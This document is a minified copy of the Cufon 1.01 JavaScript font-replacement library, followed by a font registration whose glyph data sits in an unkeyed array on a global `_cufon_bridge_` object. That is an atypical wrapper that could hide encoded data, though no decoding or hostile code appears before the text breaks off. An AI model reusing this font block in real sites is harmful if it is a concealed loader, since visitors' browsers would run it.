/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.01
 */
var Cufon=(function(){var M=function(){return M.replace.apply(null,arguments)};var X=M.DOM={ready:(function(){var c=false,e={loaded:1,complete:1};var b=[],d=function(){if(c){return }c=true;for(var f;f=b.shift();f()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",d,false);window.addEventListener("pageshow",d,false)}if(!window.opera&&document.readyState){(function(){e[document.readyState]?d():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");d()}catch(f){setTimeout(arguments.callee,1)}})()}Q(window,"load",d);return function(f){if(!arguments.length){d()}else{c?f():b.push(f)}}})(),root:function(){return document.documentElement||document.body}};var N=M.CSS={Size:function(c,b){this.value=parseFloat(c);this.unit=String(c).match(/[a-z%]*$/)[0]||"px";this.convert=function(d){return d/b*this.value};this.convertFrom=function(d){return d/this.value*b};this.toString=function(){return this.value+this.unit}},addClass:function(c,b){var d=c.className;c.className=d+(d&&" ")+b;return c},color:J(function(c){var b={};b.color=c.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(e,d,f){b.opacity=parseFloat(f);return"rgb("+d+")"});return b}),fontStretch:J(function(b){if(typeof b=="number"){return b}if(/%$/.test(b)){return parseFloat(b)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[b]||1}),getStyle:function(c){var b=document.defaultView;if(b&&b.getComputedStyle){return new A(b.getComputedStyle(c,null))}if(c.currentStyle){return new A(c.currentStyle)}return new A(c.style)},gradient:J(function(f){var g={id:f,type:f.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},c=f.substr(f.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var e=0,b=c.length,d;e<b;++e){d=c[e].split("=",2).reverse();g.stops.push([d[1]||e/(b-1),d[0]])}return g}),quotedList:J(function(e){var d=[],c=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,b;while(b=c.exec(e)){d.push(b[3]||b[1])}return d}),recognizesMedia:J(function(h){var f=document.createElement("style"),d,c,b;f.type="text/css";f.media=h;try{f.appendChild(document.createTextNode("/**/"))}catch(g){}c=G("head")[0];c.insertBefore(f,c.firstChild);d=(f.sheet||f.styleSheet);b=d&&!d.disabled;c.removeChild(f);return b}),removeClass:function(d,c){var b=RegExp("(?:^|\\s+)"+c+"(?=\\s|$)","g");d.className=d.className.replace(b,"");return d},supports:function(d,c){var b=document.createElement("span").style;if(b[d]===undefined){return false}b[d]=c;return b[d]===c},textAlign:function(e,d,b,c){if(d.get("textAlign")=="right"){if(b>0){e=" "+e}}else{if(b<c-1){e+=" "}}return e},textDecoration:function(g,f){if(!f){f=this.getStyle(g)}var c={underline:null,overline:null,"line-through":null};for(var b=g;b.parentNode&&b.parentNode.nodeType==1;){var e=true;for(var d in c){if(!K(c,d)||c[d]){continue}if(f.get("textDecoration").indexOf(d)!=-1){c[d]=f.get("color")}e=false}if(e){break}f=this.getStyle(b=b.parentNode)}return c},textShadow:J(function(f){if(f=="none"){return null}var e=[],g={},b,c=0;var d=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(b=d.exec(f)){if(b[0]==","){e.push(g);g={};c=0}else{if(b[1]){g.color=b[1]}else{g[["offX","offY","blur"][c++]]=b[2]}}}e.push(g);return e}),textTransform:(function(){var b={uppercase:function(c){return c.toUpperCase()},lowercase:function(c){return c.toLowerCase()},capitalize:function(c){return c.replace(/\b./g,function(d){return d.toUpperCase()})}};return function(e,d){var c=b[d.get("textTransform")];return c?c(e):e}})(),whiteSpace:(function(){var b={inline:1,"inline-block":1,"run-in":1};return function(e,c,d){if(b[c.get("display")]){return e}if(!d.previousSibling){e=e.replace(/^\s+/,"")}if(!d.nextSibling){e=e.replace(/\s+$/,"")}return e}})()};N.ready=(function(){var b=!N.recognizesMedia("all"),e=false;var d=[],h=function(){b=true;for(var k;k=d.shift();k()){}};var i=G("link"),j=G("style");function c(k){return k.disabled||g(k.sheet,k.media||"screen")}function g(n,q){if(!N.recognizesMedia(q||"all")){return true}if(!n||n.disabled){return false}try{var r=n.cssRules,p;if(r){search:for(var m=0,k=r.length;p=r[m],m<k;++m){switch(p.type){case 2:break;case 3:if(!g(p.styleSheet,p.media.mediaText)){return false}break;default:break search}}}}catch(o){}return true}function f(){if(document.createStyleSheet){return true}var l,k;for(k=0;l=i[k];++k){if(l.rel.toLowerCase()=="stylesheet"&&!c(l)){return false}}for(k=0;l=j[k];++k){if(!c(l)){return false}}return true}X.ready(function(){if(!e){e=N.getStyle(document.body).isUsable()}if(b||(e&&f())){h()}else{setTimeout(arguments.callee,10)}});return function(k){if(b){k()}else{d.push(k)}}})();function S(c){var b=this.face=c.face;this.glyphs=c.glyphs;this.w=c.w;this.baseSize=parseInt(b["units-per-em"],10);this.family=b["font-family"].toLowerCase();this.weight=b["font-weight"];this.style=b["font-style"]||"normal";this.viewBox=(function(){var e=b.bbox.split(/\s+/);var d={minX:parseInt(e[0],10),minY:parseInt(e[1],10),maxX:parseInt(e[2],10),maxY:parseInt(e[3],10)};d.width=d.maxX-d.minX;d.height=d.maxY-d.minY;d.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return d})();this.ascent=-parseInt(b.ascent,10);this.descent=-parseInt(b.descent,10);this.height=-this.ascent+this.descent}function F(){var c={},b={oblique:"italic",italic:"oblique"};this.add=function(d){(c[d.style]||(c[d.style]={}))[d.weight]=d};this.get=function(h,i){var g=c[h]||c[b[h]]||c.normal||c.italic||c.oblique;if(!g){return null}i={normal:400,bold:700}[i]||parseInt(i,10);if(g[i]){return g[i]}var e={1:1,99:0}[i%100],k=[],f,d;if(e===undefined){e=i>400}if(i==500){i=400}for(var j in g){if(!K(g,j)){continue}j=parseInt(j,10);if(!f||j<f){f=j}if(!d||j>d){d=j}k.push(j)}if(i<f){i=f}if(i>d){i=d}k.sort(function(m,l){return(e?(m>i&&l>i)?m<l:m>l:(m<i&&l<i)?m>l:m<l)?-1:1});return g[k[0]]}}function R(){function d(f,g){if(f.contains){return f.contains(g)}return f.compareDocumentPosition(g)&16}function b(g){var f=g.relatedTarget;if(!f||d(this,f)){return }c(this)}function e(f){c(this)}function c(f){setTimeout(function(){M.replace(f,D.get(f).options,true)},10)}this.attach=function(f){if(f.onmouseenter===undefined){Q(f,"mouseover",b);Q(f,"mouseout",b)}else{Q(f,"mouseenter",e);Q(f,"mouseleave",e)}}}function U(){var c=[],d={};function b(h){var e=[],g;for(var f=0;g=h[f];++f){e[f]=c[d[g]]}return e}this.add=function(f,e){d[f]=c.push(e)-1};this.repeat=function(){var e=arguments.length?b(arguments):c,f;for(var g=0;f=e[g++];){M.replace(f[0],f[1],true)}}}function a(){var d={},b=0;function c(e){return e.cufid||(e.cufid=++b)}this.get=function(e){var f=c(e);return d[f]||(d[f]={})}}function A(b){var d={},c={};this.extend=function(e){for(var f in e){if(K(e,f)){d[f]=e[f]}}return this};this.get=function(e){return d[e]!=undefined?d[e]:b[e]};this.getSize=function(f,e){return c[f]||(c[f]=new N.Size(this.get(f),e))};this.isUsable=function(){return !!b}}function Q(c,b,d){if(c.addEventListener){c.addEventListener(b,d,false)}else{if(c.attachEvent){c.attachEvent("on"+b,function(){return d.call(c,window.event)})}}}function V(c,b){var d=D.get(c);if(d.options){return c}if(b.hover&&b.hoverables[c.nodeName.toLowerCase()]){B.attach(c)}d.options=b;return c}function J(b){var c={};return function(d){if(!K(c,d)){c[d]=b.apply(null,arguments)}return c[d]}}function C(f,e){var b=N.quotedList(e.get("fontFamily").toLowerCase()),d;for(var c=0;d=b[c];++c){if(I[d]){return I[d].get(e.get("fontStyle"),e.get("fontWeight"))}}return null}function G(b){return document.getElementsByTagName(b)}function K(c,b){return c.hasOwnProperty(b)}function H(){var b={},d,f;for(var e=0,c=arguments.length;d=arguments[e],e<c;++e){for(f in d){if(K(d,f)){b[f]=d[f]}}}return b}function O(e,o,c,p,f,d){var m=document.createDocumentFragment(),h;if(o===""){return m}var n=p.separate;var j=o.split(P[n]),b=(n=="words");if(b&&T){if(/^\s/.test(o)){j.unshift("")}if(/\s$/.test(o)){j.push("")}}for(var k=0,g=j.length;k<g;++k){h=Z[p.engine](e,b?N.textAlign(j[k],c,k,g):j[k],c,p,f,d,k<g-1);if(h){m.appendChild(h)}}return m}function L(c,j){var b=N.getStyle(V(c,j)).extend(j);var d=C(c,b),e,h,g,f,i;for(e=c.firstChild;e;e=g){h=e.nodeType;g=e.nextSibling;if(h==3){if(f){f.appendData(e.data);c.removeChild(e)}else{f=e}if(g){continue}}if(f){c.replaceChild(O(d,N.whiteSpace(f.data,b,e),b,j,e,c),f);f=null}if(h==1&&e.firstChild){if(/cufon/.test(e.className)){Z[j.engine](d,null,b,j,e,c)}else{arguments.callee(e,j)}}}}var T=" ".split(/\s+/).length==0;var D=new a();var B=new R();var Y=new U();var E=false;var Z={},I={},W={enableTextDecoration:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},printable:true,selector:(window.Sizzle||(window.jQuery&&function(b){return jQuery(b)})||(window.dojo&&dojo.query)||(window.$$&&function(b){return $$(b)})||(window.$&&function(b){return $(b)})||(document.querySelectorAll&&function(b){return document.querySelectorAll(b)})||(window.Ext&&Ext.query)||G),separate:"words",textShadow:"none"};var P={words:/[^\S\u00a0]+/,characters:"",none:/^/};M.now=function(){X.ready();return M};M.refresh=function(){Y.repeat.apply(Y,arguments);return M};M.registerEngine=function(c,b){if(!b){return M}Z[c]=b;return M.set("engine",c)};M.registerFont=function(d){var b=new S(d),c=b.family;if(!I[c]){I[c]=new F()}I[c].add(b);return M.set("fontFamily",'"'+c+'"')};M.replace=function(d,c,b){c=H(W,c);if(!c.engine){return M}if(!E){N.addClass(X.root(),"cufon-active cufon-loading");N.ready(function(){N.removeClass(X.root(),"cufon-loading")});E=true}if(c.hover){c.forceHitArea=true}if(typeof c.textShadow=="string"){c.textShadow=N.textShadow(c.textShadow)}if(typeof c.color=="string"&&/^-/.test(c.color)){c.textGradient=N.gradient(c.color)}if(!b){Y.add(d,arguments)}if(d.nodeType||typeof d=="string"){d=[d]}N.ready(function(){for(var f=0,e=d.length;f<e;++f){var g=d[f];if(typeof g=="string"){M.replace(c.selector(g),c,true)}else{L(g,c)}}});return M};M.set=function(b,c){W[b]=c;return M};return M})();Cufon.registerEngine("canvas",(function(){var B=document.createElement("canvas");if(!B||!B.getContext||!B.getContext.apply){return }B=null;var A=Cufon.CSS.supports("display","inline-block");var E=!A&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var F=document.createElement("style");F.type="text/css";F.appendChild(document.createTextNode((".cufon-canvas{text-indent:0;}@media screen,projection{.cufon-canvas{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(E?"":"font-size:1px;line-height:1px;")+"}.cufon-canvas .cufon-alt{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(A?".cufon-canvas canvas{position:relative;}":".cufon-canvas canvas{position:absolute;}")+"}@media print{.cufon-canvas{padding:0;}.cufon-canvas canvas{display:none;}.cufon-canvas .cufon-alt{display:inline;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(F);function D(O,H){var M=0,L=0;var G=[],N=/([mrvxe])([^a-z]*)/g,J;generate:for(var I=0;J=N.exec(O);++I){var K=J[2].split(",");switch(J[1]){case"v":G[I]={m:"bezierCurveTo",a:[M+~~K[0],L+~~K[1],M+~~K[2],L+~~K[3],M+=~~K[4],L+=~~K[5]]};break;case"r":G[I]={m:"lineTo",a:[M+=~~K[0],L+=~~K[1]]};break;case"m":G[I]={m:"moveTo",a:[M=~~K[0],L=~~K[1]]};break;case"x":G[I]={m:"closePath"};break;case"e":break generate}H[G[I].m].apply(H,G[I].a)}return G}function C(K,J){for(var I=0,H=K.length;I<H;++I){var G=K[I];J[G.m].apply(J,G.a)}}return function(AH,a,z,W,e,AI){var I=(a===null);if(I){a=e.alt}var c=AH.viewBox;var K=z.getSize("fontSize",AH.baseSize);var v=z.get("letterSpacing");v=(v=="normal")?0:K.convertFrom(parseInt(v,10));var d=0,w=0,u=0,Y=0;var b=W.textShadow,s=[];if(b){for(var AG=b.length;AG--;){var m=b[AG];var r=K.convertFrom(parseFloat(m.offX));var p=K.convertFrom(parseFloat(m.offY));s[AG]=[r,p];if(p<d){d=p}if(r>w){w=r}if(p>u){u=p}if(r<Y){Y=r}}}var AL=Cufon.CSS.textTransform(a,z).split(""),U;var J=AH.glyphs,X,M,AC;var G=0,Q,h=[];for(var AG=0,AE=0,AB=AL.length;AG<AB;++AG){X=J[U=AL[AG]]||AH.missingGlyph;if(!X){continue}if(M){G-=AC=M[U]||0;h[AE-1]-=AC}G+=Q=h[AE++]=~~(X.w||AH.w)+v;M=X.k}if(Q===undefined){return null}w+=c.width-Q;Y+=c.minX;var V,L;if(I){V=e;L=e.firstChild}else{V=document.createElement("span");V.className="cufon cufon-canvas";V.alt=a;L=document.createElement("canvas");V.appendChild(L);if(W.printable){var AD=document.createElement("span");AD.className="cufon-alt";AD.appendChild(document.createTextNode(a));V.appendChild(AD)}}var AM=V.style;var o=L.style;var H=K.convert(c.height);var AK=Math.ceil(H);var t=AK/H;var n=t*Cufon.CSS.fontStretch(z.get("fontStretch"));var q=G*n;var AA=Math.ceil(K.convert(q+w-Y));var O=Math.ceil(K.convert(c.height-d+u));L.width=AA;L.height=O;o.width=AA+"px";o.height=O+"px";d+=c.minY;o.top=Math.round(K.convert(d-AH.ascent))+"px";o.left=Math.round(K.convert(Y))+"px";var T=Math.ceil(K.convert(q))+"px";if(A){AM.width=T;AM.height=K.convert(AH.height)+"px"}else{AM.paddingLeft=T;AM.paddingBottom=(K.convert(AH.height)-1)+"px"}var AJ=L.getContext("2d"),f=H/c.height;AJ.scale(f,f*t);AJ.translate(-Y,-d);AJ.lineWidth=AH.face["underline-thickness"];AJ.save();function N(i,g){AJ.strokeStyle=g;AJ.beginPath();AJ.moveTo(0,i);AJ.lineTo(G,i);AJ.stroke()}var P=W.enableTextDecoration?Cufon.CSS.textDecoration(AI,z):{};if(P.underline){N(-AH.face["underline-position"],P.underline)}if(P.overline){N(AH.ascent,P.overline)}function AF(){AJ.scale(n,1);for(var x=0,k=0,g=AL.length;x<g;++x){var y=J[AL[x]]||AH.missingGlyph;if(!y){continue}if(y.d){AJ.beginPath();if(y.code){C(y.code,AJ)}else{y.code=D("m"+y.d,AJ)}AJ.fill()}AJ.translate(h[k++],0)}AJ.restore()}if(b){for(var AG=b.length;AG--;){var m=b[AG];AJ.save();AJ.fillStyle=m.color;AJ.translate.apply(AJ,s[AG]);AF()}}var S=W.textGradient;if(S){var Z=S.stops,R=AJ.createLinearGradient(0,c.minY,0,c.maxY);for(var AG=0,AB=Z.length;AG<AB;++AG){R.addColorStop.apply(R,Z[AG])}AJ.fillStyle=R}else{AJ.fillStyle=z.get("color")}AF();if(P["line-through"]){N(-AH.descent,P["line-through"])}return V}})());Cufon.registerEngine("vml",(function(){if(!document.namespaces){return }if(document.namespaces.cvml==null){document.namespaces.add("cvml","urn:schemas-microsoft-com:vml")}var B=document.createElement("cvml:shape");B.style.behavior="url(#default#VML)";if(!B.coordsize){return }B=null;var F=(document.documentMode||0)<8;document.write(('<style type="text/css">.cufon-vml-canvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}.cufon-vml-canvas{position:absolute;text-align:left;}.cufon-vml{display:inline-block;position:relative;vertical-align:'+(F?"middle":"text-bottom")+";}.cufon-vml .cufon-alt{position:absolute;left:-10000in;font-size:1px;}a .cufon-vml{cursor:pointer}}@media print{.cufon-vml *{display:none;}.cufon-vml .cufon-alt{display:inline;}}</style>").replace(/;/g,"!important;"));function C(G,H){return A(G,/(?:em|ex|%)$|^[a-z-]+$/i.test(H)?"1em":H)}function A(J,K){if(/px$/i.test(K)){return parseFloat(K)}var I=J.style.left,H=J.runtimeStyle.left;J.runtimeStyle.left=J.currentStyle.left;J.style.left=K.replace("%","em");var G=J.style.pixelLeft;J.style.left=I;J.runtimeStyle.left=H;return G}var E={};function D(L){var M=L.id;if(!E[M]){var J=L.stops,K=document.createElement("cvml:fill"),G=[];K.type="gradient";K.angle=180;K.focus="0";K.method="sigma";K.color=J[0][1];for(var I=1,H=J.length-1;I<H;++I){G.push(J[I][0]*100+"% "+J[I][1])}K.colors=G.join(",");K.color2=J[H][1];E[M]=K}return E[M]}return function(AI,f,AC,b,n,AJ,AA){var J=(f===null);if(J){f=n.alt}var h=AI.viewBox;var L=AC.computedFontSize||(AC.computedFontSize=new Cufon.CSS.Size(C(AJ,AC.get("fontSize"))+"px",AI.baseSize));var z=AC.computedLSpacing;if(z==undefined){z=AC.get("letterSpacing");AC.computedLSpacing=z=(z=="normal")?0:~~L.convertFrom(A(AJ,z))}var X,M;if(J){X=n;M=n.firstChild}else{X=document.createElement("span");X.className="cufon cufon-vml";X.alt=f;M=document.createElement("span");M.className="cufon-vml-canvas";X.appendChild(M);if(b.printable){var AF=document.createElement("span");AF.className="cufon-alt";AF.appendChild(document.createTextNode(f));X.appendChild(AF)}if(!AA){X.appendChild(document.createElement("cvml:shape"))}}var AO=X.style;var u=M.style;var H=L.convert(h.height),AL=Math.ceil(H);var y=AL/H;var s=y*Cufon.CSS.fontStretch(AC.get("fontStretch"));var x=h.minX,w=h.minY;u.height=AL;u.top=Math.round(L.convert(w-AI.ascent));u.left=Math.round(L.convert(x));AO.height=L.convert(AI.height)+"px";var Q=b.enableTextDecoration?Cufon.CSS.textDecoration(AJ,AC):{};var e=AC.get("color");var AN=Cufon.CSS.textTransform(f,AC).split(""),W;var K=AI.glyphs,c,N,AE;var G=0,o=[],v=0,S;var U,g=b.textShadow;for(var AH=0,AG=0,AD=AN.length;AH<AD;++AH){c=K[W=AN[AH]]||AI.missingGlyph;if(!c){continue}if(N){G-=AE=N[W]||0;o[AG-1]-=AE}G+=S=o[AG++]=~~(c.w||AI.w)+z;N=c.k}if(S===undefined){return null}var V=-x+G+(h.width-S);var AM=L.convert(V*s),AB=Math.round(AM);var r=V+","+h.height,I;var m="r"+r+"ns";var T=b.textGradient&&D(b.textGradient);for(AH=0,AG=0;AH<AD;++AH){c=K[AN[AH]]||AI.missingGlyph;if(!c){continue}if(J){U=M.childNodes[AG];while(U.firstChild){U.removeChild(U.firstChild)}}else{U=document.createElement("cvml:shape");M.appendChild(U)}U.stroked="f";U.coordsize=r;U.coordorigin=I=(x-v)+","+w;U.path=(c.d?"m"+c.d+"xe":"")+"m"+I+m;U.fillcolor=e;if(T){U.appendChild(T.cloneNode(false))}var AK=U.style;AK.width=AB;AK.height=AL;if(g){var P=g[0],O=g[1];var a=Cufon.CSS.color(P.color),Y;var q=document.createElement("cvml:shadow");q.on="t";q.color=a.color;q.offset=P.offX+","+P.offY;if(O){Y=Cufon.CSS.color(O.color);q.type="double";q.color2=Y.color;q.offset2=O.offX+","+O.offY}q.opacity=a.opacity||(Y&&Y.opacity)||1;U.appendChild(q)}v+=o[AG++]}var p=U.nextSibling,R,Z;if(b.forceHitArea){if(!p){p=document.createElement("cvml:rect");p.stroked="f";p.className="cufon-vml-cover";R=document.createElement("cvml:fill");R.opacity=0;p.appendChild(R);M.appendChild(p)}Z=p.style;Z.width=AB;Z.height=AL}else{if(p){M.removeChild(p)}}AO.width=Math.max(Math.ceil(L.convert(G*s)),0);if(F){var t=AC.computedYAdjust;if(t===undefined){var d=AC.get("lineHeight");if(d=="normal"){d="1em"}else{if(!isNaN(d)){d+="em"}}AC.computedYAdjust=t=0.5*(A(AJ,d)-parseFloat(AO.height))}if(t){AO.marginTop=Math.ceil(t)+"px";AO.marginBottom=t+"px"}}return X}})());

Cufon.registerFont((function(f){_cufon_bridge_={p:[{"d":"194,-240r-78,140r0,100r-44,0r0,-100r-75,-140r47,0v17,37,41,72,52,114v9,-42,36,-79,54,-114r44,0","w":191,"k":{"v":10,"u":20,"t":4,"s":28,"p":20,"o":31,"m":26,"l":6,"i":6,"g":32,"e":30,"b":6,"a":31,"S":3,"O":12}},{"d":"175,-69v0,46,-30,75,-81,75v-50,0,-71,-29,-80,-41r29,-25v20,43,85,39,87,-11v1,-35,-28,-42,-67,-40r0,-29v37,3,62,-10,62,-38v0,-19,-11,-33,-32,-33v-21,0,-33,12,-43,25r-26,-27v0,0,27,-33,72,-33v45,0,72,22,72,63v0,33,-24,51,-39,54v15,2,46,16,46,60","k":{"7":13,"4":1,"1":15}},{"d":"183,-64v0,49,-41,70,-85,70v-43,0,-82,-23,-82,-70v0,-32,17,-52,47,-63v-26,-10,-37,-29,-37,-56v0,-44,35,-63,75,-63v37,0,72,19,72,60v0,27,-12,47,-38,57v28,12,48,33,48,65xm100,-146v36,-5,44,-69,0,-69v-49,2,-35,64,0,69xm138,-66v0,-23,-20,-37,-39,-43v-45,5,-53,81,0,81v24,0,39,-14,39,-38","k":{"~":-6,"7":17,"4":-3,"1":10,".":-3,"-":-3}},{"d":"194,-240r-73,240r-49,0r-73,-240r47,0r43,155v4,15,7,31,9,46v12,-71,35,-134,51,-201r45,0","w":192,"k":{"u":11,"r":3,"o":12,"i":-5,"e":15,"a":12,"W":-16,"S":-1,"O":5,"A":8,".":6,",":12}},{"d":"205,-85v0,60,-29,90,-91,90v-62,0,-89,-31,-89,-90r0,-155r44,0r0,154v0,32,7,55,46,55v40,0,46,-22,46,-55r0,-154r44,0r0,155","w":229,"k":{"z":1,"w":-3,"t":-2,"r":-2,"p":-2,"n":-2,"m":-2,"l":-2,"k":-2,"i":-1,"f":-3,"e":-1,"d":-1,"Z":6,"O":3,"I":-3,"G":2,"C":2,"A":5,".":4,",":8}},{"d":"180,-205r-68,0r0,205r-44,0r0,-205r-68,0r0,-35r180,0r0,35","w":180,"k":{"z":1,"y":27,"w":37,"v":32,"u":40,"s":28,"r":29,"o":41,"m":37,"l":-4,"j":-4,"i":2,"h":4,"g":17,"e":42,"b":4,"a":33,"Z":-6,"Y":-17,"W":-15,"V":-17,"T":-16,"S":-5,"Q":5,"O":5,"I":-4,"G":5,"A":14,".":9,"-":-8,",":9}},{"d":"175,0r-150,0r0,-240r44,0r0,205r106,0r0,35","w":174,"k":{"z":-11,"y":1,"w":5,"v":8,"u":-4,"t":1,"s":-13,"o":-3,"i":-4,"g":-9,"e":-4,"d":-4,"c":-4,"a":-9,"Z":-10,"Y":19,"W":6,"V":13,"T":24,"S":-9,"O":2,".":-6,",":-6}},{"d":"177,-85v0,52,-26,90,-81,90v-34,0,-67,-19,-78,-52r36,-17v6,18,20,34,41,34v51,1,51,-97,2,-98v-16,0,-28,8,-34,23r-37,-6r15,-129r124,0r0,36r-89,0r-6,57v46,-37,107,3,107,62","k":{"7":12,"1":15}},{"d":"208,-122v0,71,-29,122,-106,122r-77,0r0,-240r70,0v81,0,113,39,113,118xm160,-120v0,-55,-22,-95,-91,-85r0,170v67,9,91,-31,91,-85","w":224,"k":{"y":-4,"o":-1,"e":-3,"Y":9,"W":2,"U":2,"T":1,"A":5,",":6}},{"d":"87,44r-69,0r0,-30r31,0r0,-269r-31,0r0,-29r69,0r0,328","w":111},{"d":"163,-162r-36,0r-37,-73r-37,73r-36,0r51,-100r44,0","w":180},{"d":"102,-77r-102,0r0,-40r102,0r0,40","w":102,"k":{"8":-10,"7":10,"4":-13,"1":26}},{"d":"206,0r-44,0r0,-107r-93,0r0,107r-44,0r0,-240r44,0r0,98r93,0r0,-98r44,0r0,240","w":230,"k":{"y":-4,"u":-3,"o":-2,"i":-3,"g":-2,"e":-3,"a":-3,"Z":2,"S":-1,"Q":4,"I":-5}},{"d":"183,-122v0,57,-12,128,-84,128v-70,0,-82,-68,-82,-124v0,-57,11,-128,82,-128v70,0,84,68,84,124xm137,-121v0,-25,-2,-90,-38,-90v-37,0,-37,66,-37,92v0,24,2,90,37,90v37,0,38,-66,38,-92","k":{"7":15,"4":-2,"1":15}},{"d":"211,0r-59,0r-70,-148v-8,-17,-16,-34,-21,-53v10,61,3,133,5,201r-41,0r0,-240r60,0v29,66,65,128,89,198v-8,-61,-3,-131,-4,-198r41,0r0,240","w":235,"k":{"u":-3,"o":-2,"j":-4,"i":-3,"g":-2,"e":-3,"d":-3,"c":-2,"a":-3,"S":-1,"Q":4,"J":-5,"I":-5,"A":-4,".":-1,",":6}},{"d":"104,44v-41,3,-72,-5,-69,-44v-6,-39,18,-101,-25,-105r0,-31v70,-8,-35,-170,94,-148r0,27v-19,0,-33,-1,-33,23v0,48,13,106,-32,114v49,5,32,67,32,114v0,24,14,23,33,23r0,27","w":111,"k":{"4":-3}},{"d":"184,0r-48,0r-46,-91r-24,27r0,64r-42,0r0,-251r42,0r-1,141v17,-27,42,-51,62,-76r49,0r-57,66","w":182,"k":{"y":-13,"w":-12,"u":-1,"o":5,"g":-10,"e":4,"d":4,"a":-3,".":-6,"-":-9,",":-6}},{"d":"210,-168r-47,6v-4,-26,-16,-49,-46,-49v-47,0,-52,58,-52,93v0,36,6,88,53,88v19,0,36,-10,48,-24r0,-36r-49,0r0,-31r91,0r0,121r-32,0r-4,-22v-16,17,-36,28,-60,28v-73,0,-95,-61,-95,-124v0,-66,26,-128,101,-128v50,0,83,29,92,78","w":230,"k":{"v":-3,"t":-3,"r":-1,"o":1,"l":-1,"k":-1,"a":1,"V":4,"U":4,"T":2,"S":-2,"R":1,"N":1,"M":1,"L":1,"K":1,"I":1,"F":1,"E":1,"B":1,"A":-5,",":5}},{"d":"179,0r-154,0r0,-240r148,0r0,35r-104,0r0,64r85,0r0,36r-85,0r0,70r110,0r0,35","w":190,"k":{"w":1,"v":1,"u":1,"s":-7,"q":1,"p":1,"o":2,"j":-7,"i":1,"g":-4,"e":1,"d":1,"c":2,"b":1,"a":-4,"Z":-5,"X":-10,"W":-7,"V":-8,"U":4,"T":-8,"S":-3,"Q":7,"O":7,"G":6,"C":6,"A":-11,".":-1}},{"d":"171,-50v0,0,-13,55,-76,55v-53,0,-80,-34,-80,-95v0,-62,28,-102,80,-102v66,0,76,61,76,61r-41,9v0,0,-7,-37,-35,-37v-23,0,-36,24,-36,67v0,42,12,64,36,64v29,0,36,-35,36,-35","w":176,"k":{"t":-4,"m":-1,"l":-1,"k":-1,"h":-1,"T":15,"O":-4,"E":-3,"A":-6}},{"d":"179,-124v0,91,-28,130,-90,130v-48,0,-66,-30,-66,-30r31,-25v0,0,14,21,37,21v32,0,43,-32,44,-80v0,0,-18,21,-50,21v-46,0,-66,-33,-66,-78v0,-66,45,-81,82,-81v61,0,78,53,78,122xm97,-119v29,-8,38,-14,38,-37v0,-22,-2,-56,-34,-56v-23,0,-38,13,-38,45v0,30,8,48,34,48","k":{"7":23,"1":17}},{"d":"102,-77r-102,0r0,-40r102,0r0,40","w":102},{"d":"118,-262r-3,32v-29,-10,-45,9,-39,43r35,0r0,34r-35,0r0,153r-42,0r0,-153r-29,0r0,-33r28,0v-1,-45,0,-78,53,-79v10,0,22,2,32,3","w":113,"k":{"z":-5,"w":-13,"s":-5,"r":-2,"o":2,"g":-2,"a":-4,".":3,",":3}},{"d":"273,0r-42,0r0,-121v0,-18,-1,-36,-24,-36v-16,0,-28,11,-37,23r0,134r-42,0r0,-125v4,-42,-49,-36,-62,-9r0,134r-42,0r0,-187r39,0r1,25v25,-30,85,-44,102,1v26,-41,107,-42,107,26r0,135","w":296,"k":{"u":-1,"p":-1,"e":-1,"E":-3,",":1}},{"d":"174,0r-48,0v-14,-25,-29,-50,-37,-78v-9,28,-25,54,-38,78r-48,0r58,-99r-52,-88r49,0v9,18,29,46,31,65v5,-22,20,-46,30,-65r48,0r-51,88","w":176,"k":{"t":-8,"e":5,"d":5}},{"d":"165,-187r-64,193v-8,39,-44,75,-99,59r4,-33v32,7,54,-7,57,-37r-65,-182r45,0v13,46,32,89,41,139v9,-49,26,-93,39,-139r42,0","w":164,"k":{"s":-1,"p":-4,"o":3,"a":4}},{"d":"171,-111v-10,21,-26,42,-51,42v-33,0,-75,-42,-93,1r-18,-11v10,-20,23,-42,49,-42v33,0,75,40,94,-1","w":180,"k":{"8":-10,"7":17,"4":-13,"1":30}},{"d":"156,-51v0,45,-28,56,-72,56v-60,0,-78,-41,-78,-41r34,-19v0,0,11,27,42,27v17,0,34,-5,34,-18v0,-18,-29,-26,-42,-31v-27,-12,-59,-21,-59,-62v0,-33,26,-53,69,-53v53,0,69,38,69,38r-33,16v0,0,-8,-21,-36,-21v-21,0,-29,9,-29,18v0,18,21,21,44,30v27,10,57,23,57,60","w":163,"k":{"y":-4,"w":-4,"v":-4,"t":-5,"s":-6,"p":-2,"o":-1,"g":-1,"e":-2,"d":-1,"c":-1,"b":-2,"a":-4,"Y":12,"W":1,"V":3,"T":14,".":-1,",":-1}},{"d":"60,-251r-2,87r-31,0r-3,-87r36,0","w":84,"k":{"4":17,"2":-6}},{"w":90},{"d":"165,-79r-150,70r0,-33r117,-52r-117,-51r0,-33r150,70r0,29","w":180},{"d":"147,0r-138,0r0,-27v30,-43,55,-90,89,-129v-25,4,-52,3,-80,3r0,-34r127,0r0,28v-29,42,-52,89,-85,127v27,-4,57,-1,87,-2r0,34","w":156,"k":{"w":-9,"s":-7,"o":2,"g":-4,"e":1,"d":1,"a":-4,"W":-4,"U":2,".":-1,",":-1}},{"d":"180,0r-168,0r0,-31r116,-175r-107,1r0,-35r157,0r0,29r-91,138v-9,13,-18,25,